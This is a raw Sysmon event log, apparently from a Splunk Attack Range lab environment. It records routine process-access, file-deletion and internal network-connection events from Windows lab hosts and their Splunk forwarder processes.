10:52:51.518{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217044Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:51.518{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217043Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:51.518{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217042Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:51.518{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1203-6216-6B04-000000003902}3184C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217041Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:51.518{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1203-6216-6B04-000000003902}3184C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217040Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:51.519{4F8D34B0-1203-6216-6B04-000000003902}3184C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000217039Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:51.159{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B1B29971DB689D6A676703841A54F55,SHA256=83D3FA77505B107E898FEBEA2CE1A328765F08BF44D81A15BF1EFBA8F80F9E80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289093Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:51.511{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11A1325884D0AACBFA7823ED9EFC6748,SHA256=4B140467E6DF3E7A6193D6BD4D357AF48216586BE30A65B9229766A7B102B1BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217054Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:52.518{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DDF893B6FA464D1CC37EFB7F9C13E32F,SHA256=C9193FA1598A3EDB3E06AAC91106FA4FE4391DB9D145F49617568920ECAF418B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217053Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:52.393{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CFF23AF1C26EB648B1888CE61BE6B1F,SHA256=F2C9DD345250DE82CF9D74686A50DE5A79E75694347AA78DCD494BF6DD9E3054,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289094Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:52.525{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A149B27850BA4A4AF1D80CE54BDA53FD,SHA256=61DE685A6253B0D79D4AA482EA997EF367948F4382D9949647E716707610E545,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289096Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:53.540{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E64F287EC21E1E676C35CD008DE07642,SHA256=8C1083F4578FD5C7B735D959F1D88B8C66D66C0F2A116590841323DBF7418B9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217055Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:53.409{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABE175A2C6695D69C92ABD4F63F5E881,SHA256=F4FAECED7AB515A6579B79E3EF92045EDC586AEF3DF6D8741ED684B3A521FE24,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289095Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:50.584{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53507-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000289097Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:54.541{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66565F43996DB9DBD3F13F6B3FD4E773,SHA256=C292E3AD2B49E792165D575779D0D172E2E7769FCF65B9CDEF2F02E7945AD895,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217056Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:54.409{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DF424E0094CCF9237BC468F8FF62493,SHA256=7F89B61F831E4E2E144036998EC299EBC6A835A8B3D702E9D3981CF725B73169,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217058Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:53.509{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51366-false10.0.1.12-8000- 23542300x8000000000000000217057Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:55.440{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DC8F2B45F0BB463103B517A036F8EF9,SHA256=8B433A16FD84F6085CECAC835755080FC9313C538BB2AB18E5FBFA74D873604E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289098Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:55.556{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAC980D54A38BA1CD0CEA5BD869A28CA,SHA256=351AA0202D837CF8D3D0E682CF7808B98BE54960A44FF8BCE6420B5C033FA67F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217059Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:56.612{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CCA437C16A242F75BEAA197C71AC3A3,SHA256=3C90D44775AB3471FEFA6D1E3C836CE2970767B3A6877272430C016BEB22EE0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289099Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:56.593{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=407121074D90A03FAC934B7CAD55E6E1,SHA256=9A5766FF808DBFCABF0C2C809A4695AB254A1C20917796D690B88CD8FD6729CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217060Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:57.627{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E1992CDC288F59ED671DB48EF62050B,SHA256=EEFC707B7DB6736BC4B0C37AC556BBA82D7094B1EB164BEE75F7EF1BC44A00E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289100Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:57.609{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B087E0167D7F39A02AEAC93D51488B9D,SHA256=3C166A1EBA8E654A07A0EADB5DDBBFD3AD0757710AF15982CB585D51FCA9795E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217061Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:58.737{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=576207406E2C4D94BA9CE005AB390277,SHA256=57E69BCD4D46D051965337752703328416463E7158299FCE184194DE6BDEBB31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289102Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:58.624{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04567CA71079C595927F11254C8208AA,SHA256=5CF0F7F9FBC7C2122629AE2F180003FE9C1460E83A93EE4BCC485032F7FE81A9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289101Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:55.645{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53508-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000217062Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:59.768{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64BD4766750741973175360F9EFECE35,SHA256=AE295BBC6CAB2D33C5F3980901B5BEE8C5AFF910B76775D85023166CF0BABD5D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289137Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289136Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289135Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289134Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289133Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289132Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289131Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289130Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289129Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289128Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289127Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289126Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 